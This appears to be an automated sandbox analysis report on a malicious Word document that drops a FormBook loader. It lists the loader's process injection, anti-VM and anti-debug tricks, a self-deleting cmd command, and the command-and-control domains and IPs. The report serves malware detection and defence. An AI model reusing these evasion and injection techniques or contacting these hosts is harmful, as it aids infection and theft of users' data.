Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\hasmenhtk721.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\hasmenhtk721.exe'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$Q9003930 New Order.doc

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRF594.tmp

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@9/8@4/3

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Runs a DLL by calling functions

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Binary contains paths to development resources

Source: explorer.exe, 00000006.00000000.522105380.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: wntdll.pdb source: hasmenhtk721.exe, rundll32.exe
Source:	Binary string: rundll32.pdb source: hasmenhtk721.exe, 00000005.00000002.477204185.0000000000504000.00000004.00000020.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Source: harshmanzx[1].exe.2.dr, Darwin.WindowsForm/MainForm.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: hasmenhtk721.exe.2.dr, Darwin.WindowsForm/MainForm.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.hasmenhtk721.exe.bb0000.0.unpack, Darwin.WindowsForm/MainForm.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.hasmenhtk721.exe.bb0000.2.unpack, Darwin.WindowsForm/MainForm.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.hasmenhtk721.exe.bb0000.0.unpack, Darwin.WindowsForm/MainForm.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.hasmenhtk721.exe.bb0000.3.unpack, Darwin.WindowsForm/MainForm.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041716F push ebx; ret		5_2_0041718F
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0040E288 push ebp; ret		5_2_0040E289
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041D4F2 push eax; ret		5_2_0041D4F8
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041D4FB push eax; ret		5_2_0041D562
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041D4A5 push eax; ret		5_2_0041D4F8
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041D55C push eax; ret		5_2_0041D562
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041ED7F push dword ptr [F1875581h]; ret		5_2_0041F01B
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CBDFA1 push ecx; ret		5_2_00CBDFB4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023FDFA1 push ecx; ret		7_2_023FDFB4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000B716F push ebx; ret		7_2_000B718F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000AE288 push ebp; ret		7_2_000AE289
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000BD4A5 push eax; ret		7_2_000BD4F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000BD4FB push eax; ret		7_2_000BD562
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000BD4F2 push eax; ret		7_2_000BD4F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000BD55C push eax; ret		7_2_000BD562
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000BED7F push dword ptr [F1875581h]; ret		7_2_000BF01B

Binary may include packed or encrypted code

Source: initial sample	Static PE information: section name: .text entropy: 7.04755215007
Source: initial sample	Static PE information: section name: .text entropy: 7.04755215007

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\harshmanzx[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xEA

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hasmenhtk721.exe PID: 2308, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000000A9904 second address: 00000000000A990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000000A9B6E second address: 00000000000A9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2652	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe TID: 760	Thread sleep time: -34097s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe TID: 2560	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\explorer.exe TID: 2836	Thread sleep time: -40000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\rundll32.exe

Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

Code function: 5_2_00409AA0 rdtsc

5_2_00409AA0

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Queries a list of all running processes

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

Process information queried: ProcessInformation

Jump to behavior

Contains medium sleeps (>= 30s)

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Thread delayed: delay time: 34097			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 00000006.00000000.468484505.0000000008438000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000k
Source: explorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.449394669.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.468484505.0000000008438000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0N
Source: explorer.exe, 00000006.00000000.465258321.00000000045D4000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmp	Binary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

Code function: 5_2_00409AA0 rdtsc

5_2_00409AA0

Enables debug privileges

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

Process token adjusted: Debug

Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CA00EA mov eax, dword ptr fs:[00000030h]		5_2_00CA00EA
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CA0080 mov ecx, dword ptr fs:[00000030h]		5_2_00CA0080
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CC26F8 mov eax, dword ptr fs:[00000030h]		5_2_00CC26F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_024026F8 mov eax, dword ptr fs:[00000030h]		7_2_024026F8

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

Code function: 5_2_0040ACE0 LdrLoadDll,

5_2_0040ACE0

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.ceasa.club
Source: C:\Windows\explorer.exe	Network Connect: 166.62.10.138 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.eastwestasia-thailand.com
Source: C:\Windows\explorer.exe	Domain query: www.alzayantourism.com
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.215 80			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 70000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

Memory written: C:\Users\user\AppData\Roaming\hasmenhtk721.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Thread register set: target process: 1764			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 1764			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Process created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\hasmenhtk721.exe'			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000006.00000000.460524294.0000000000750000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688441808.0000000000CF0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.460524294.0000000000750000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688441808.0000000000CF0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.460524294.0000000000750000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688441808.0000000000CF0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

Queries volume information: C:\Users\user\AppData\Roaming\hasmenhtk721.exe VolumeInformation

Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
